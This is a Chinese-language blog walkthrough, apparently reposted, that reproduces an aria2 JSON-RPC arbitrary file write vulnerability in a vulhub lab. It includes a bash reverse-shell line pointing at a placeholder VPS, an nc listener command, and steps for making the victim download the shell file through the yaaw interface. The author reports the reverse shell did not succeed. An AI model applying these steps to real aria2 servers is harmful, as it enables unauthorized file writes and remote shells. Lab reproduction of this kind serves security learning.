漏洞复现-aria2-任意文件写入
2021/4/12 18:59:02
本文主要是介绍漏洞复现-aria2-任意文件写入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
0x00 实验环境
攻击机:Win 10
靶机也可作为攻击机:Ubuntu18 (docker搭建的vulhub靶场)
0x01 影响版本
影响版本:6800端口,存在/jsonrpc文件时
漏洞简介:Aria2是一个命令行下轻量级、多协议、多来源的下载工具(支持 HTTP/HTTPS、FTP、BitTorrent、Metalink),内建XML-RPC和JSON-RPC接口。在有权限的情况下,我们可以使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞
0x02 漏洞复现
(1)访问页面:
扫描端口发现,(注意这里的版本信息:aria2 downloader JSON-RPC)
(2)这里复现需要使用到一款轻量级的web写入工具:
http://binux.github.io/yaaw/demo/
(3)在使用之前,需要自己搭建一个服务器,同时放入(将shell文件放在www目录下)需要反弹的shell文件(这里我是使用python2启动一个简单的web服务,到时候远程访问的时候就可以下载写入):
#!/bin/bash /bin/bash -i >& /dev/tcp/your_vps/8899 0>&1 #换行是必须地
(4)首先手动测试一下这个shell能否反弹成功:(反弹成功!!!)
(5)然后我们开始进入复现的正题:
在攻击机开启监听:
nc -lvvp 8899
点击setting添加新增并且设置下载任务,填写shell的url,及受害主机shell文件的存储路径
去肉鸡查看,文件是有写入的,只是shell没有正常反弹过来:
没有反弹过来也可能是因为shell的执行权限不够:
其实也可以自己手动弹,但是我始终没有找到一个好的办法来反弹shell,等遇到这种漏洞的时候再说。
这篇关于漏洞复现-aria2-任意文件写入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign学习入门:轻松掌握微服务通信
- 2024-12-27OpenFeign学习入门:轻松掌握微服务间的HTTP请求
- 2024-12-27JDK17新特性学习入门:简洁教程带你轻松上手
- 2024-12-27JMeter传递token学习入门教程
- 2024-12-27JMeter压测学习入门指南
- 2024-12-27JWT单点登录学习入门指南
- 2024-12-27JWT单点登录原理学习入门
- 2024-12-27JWT单点登录原理学习入门